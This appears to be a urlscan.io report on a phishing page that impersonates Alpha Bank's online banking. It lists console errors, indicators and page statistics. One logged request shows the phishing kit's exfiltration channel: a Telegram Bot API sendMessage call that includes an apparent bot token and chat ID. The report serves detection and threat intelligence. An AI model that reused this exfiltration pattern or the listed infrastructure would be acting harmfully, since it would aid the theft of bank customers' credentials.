Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: Alpha Bank (Banking)

0 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

0 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

10 Console Messages

A page may trigger messages to the console to be logged. These are often error messages about being unable to load a resource or execute a piece of JavaScript. Sometimes they also provide insight into the technology behind a website.

Source	Level	URL Text
network	error	URL: https://api.telegram.org/bot5239022409:AAHpg2ofc5lmqr3e-6klc32cfOWzFUZcpac/sendMessage?chat_id=5164794198&text=aplpha12 Message: Failed to load resource: the server responded with a status of 403 ()
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold_1.woff2 Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/OpenSans-Regular.woff2 Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold_1.woff Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/OpenSans-Regular.woff Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold_1.ttf Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/web/AL/fonts/opensans/OpenSans-Regular.ttf Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold.woff2 Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold.woff Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)
network	error	URL: https://secure-alpha-497da0be515757web.gidiagents.com/ebanking/content/fonts/opensans/OpenSans-Bold.ttf Message: Failed to load resource: the server responded with a status of 500 (Internal Server Error)

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

api.telegram.org
secure-alpha-497da0be515757web.gidiagents.com
2001:67c:4e8:f004::9
70.39.233.244
0735fb7399059f96adfcea3b0378e2df6e08488c6b65627e4fb79e1d127b3336
1d8a383f5727476350dc5f199d484548d27adf907c3ec019820a0604821145ce
21503eecb48b62604d6855e33399ab5731f3679a03d412065ea47464de612785
4626e282c2921300f1f087f82643dfe7c3482ef156d4f151d5d892d1a6cb7f49
9e59a659fca8003d3da1cfd2b5bc8fd720c26816aa00eaf8a6359b00c1135f1e
a1612606ef48d6a8c375d4a747b8c1fe4f6927e242ec21c449b27ed0325505f2
a7b625a085dc2e7e3c7c5d882c279d6e6da3a860fb17c041232a575bfe033f1d
a9ba69a712ca83a83213bb90a9f821da8c904c9f954eba6c5e7e23bdad6e2c3e
b9294cf365d3365ce77692019b950cd5c1c1ea1187aa6cc891b0ee1457578643
dd892e8748d7c8b9068fc17b082e57ba012a3e1923f8ea0323f4a325e5367e52
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
ed71ce33d772d291d9c787d26972c89d581a81b6b5e10bfaa8a18173a9877f4c

secure-alpha-497da0be515757web.gidiagents.com Open in urlscan Pro 70.39.233.244 Malicious Activity! Public Scan

Summary

urlscan.io Verdict: Potentially Malicious

Domain & IP information

Screenshot Live screenshot Full Image

Page Title

Page Statistics

21 Requests

100 %HTTPS

50 %IPv6

2 Domains

2 Subdomains

2 IPs

2 Countries

1357 kBTransfer

1355 kBSize

0 Cookies

0 Outgoing links

Redirected requests

21 HTTP transactions Everything HTML Script AJAX CSS Image Expand all 0 data transactions

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

0 JavaScript Global Variables

0 Cookies

10 Console Messages

Indicators

secure-alpha-497da0be515757web.gidiagents.com Open in urlscan Pro
70.39.233.244 Malicious Activity! Public Scan

Screenshot
Live screenshot

Full Image

21
Requests

100 %
HTTPS

50 %
IPv6

2
Domains

2
Subdomains

2
IPs

2
Countries

1357 kB
Transfer

1355 kB
Size

0
Cookies

21 HTTP transactions
0 data transactions

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!